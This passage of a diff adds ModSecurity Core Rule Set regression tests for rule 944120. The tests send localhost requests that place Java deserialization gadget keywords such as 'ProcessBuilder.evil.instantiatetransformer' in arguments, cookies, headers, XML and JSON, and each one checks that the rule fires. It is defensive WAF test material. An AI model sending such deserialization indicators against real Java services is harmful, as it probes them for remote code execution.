+ output: + log_contains: "id \"944120\"" + - test_title: 944120-26 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-27 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-28 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" + output: + log_contains: "id \"944120\"" + - test_title: 
944120-29
+ desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-30
+ desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/json
+
+ {"ProcessBuilder.evil.forclosure": "test"}
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-31
+ desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/json
+
+ {"ProcessBuilder.evil.forclosure": "test"}
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-32
+ desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/xml
+
+ ProcessBuilder.evil.forclosure
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-33
+ desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/xml
+
+ ProcessBuilder.evil.forclosure
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-34
+ desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=ProcessBuilder.evil.instantiatefactory"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-35
+ desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.instantiatefactory=test"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-36
+ desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=ProcessBuilder.evil.instantiatefactory
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-37
+ desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: ProcessBuilder.evil.instantiatefactory=test
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-38
+ desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: ProcessBuilder.evil.instantiatefactory
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-39
+ desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "value"
+ output:
+ no_log_contains: "id \"944120\""
+ - test_title: 944120-40
+ desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ no_log_contains: "id \"944120\""
+ - test_title: 944120-41
+ desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-42
+ desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.instantiatefactory"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-43
+ desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.instantiatefactory"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-44
+ desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=ProcessBuilder.evil.instantiatefactory"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-45
+ desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-46
+ desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-47
+ desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/json
+
+ {"ProcessBuilder.evil.instantiatefactory": "test"}
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-48
+ desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/json
+
+ {"ProcessBuilder.evil.instantiatefactory": "test"}
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-49
+ desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/xml
+
+ ProcessBuilder.evil.instantiatefactory
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-50
+ desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/xml
+
+ ProcessBuilder.evil.instantiatefactory
+ -----------------------------thisissparta--
+ output:
+ log_contains: id "944120"
+ - test_title: 944120-51
+ desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=ProcessBuilder.evil.instantiatetransformer"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-52
+ desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.instantiatetransformer=test"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-53
+ desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=ProcessBuilder.evil.instantiatetransformer
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-54
+ desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: ProcessBuilder.evil.instantiatetransformer=test
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-55
+ desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: ProcessBuilder.evil.instantiatetransformer
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-56
+ desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "value"
+ output:
+ no_log_contains: "id \"944120\""
+ - test_title: 944120-57
+ desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ no_log_contains: "id \"944120\""
+ - test_title: 944120-58
+ desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-59
+ desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.instantiatetransformer"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-60
+ desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.instantiatetransformer"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-61
+ desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=ProcessBuilder.evil.instantiatetransformer"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-62
+ desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-63
+ desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "ModSecurity CRS 3 Tests"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-64
+ desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
